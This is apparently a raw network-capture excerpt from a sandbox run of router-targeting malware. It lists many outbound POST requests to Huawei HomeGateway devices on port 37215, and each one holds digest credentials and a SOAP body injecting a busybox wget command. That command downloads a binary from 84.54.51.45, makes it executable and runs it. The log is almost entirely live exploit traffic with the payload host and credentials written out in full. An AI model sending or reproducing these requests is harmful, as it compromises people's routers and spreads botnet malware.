                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1359192.168.2.1557638197.125.169.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731484890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1360192.168.2.1551942197.6.172.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731484890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1361192.168.2.1533086197.118.248.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731528044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1362192.168.2.1557512197.211.117.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731538057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1363192.168.2.1544582197.169.83.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731542110 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1364192.168.2.1554428197.143.196.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731591940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1365192.168.2.1539436197.228.0.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731595993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1366192.168.2.1545754197.86.18.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731599092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1367192.168.2.1556836197.142.177.7237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731620073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1368192.168.2.1560730197.39.55.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731653929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
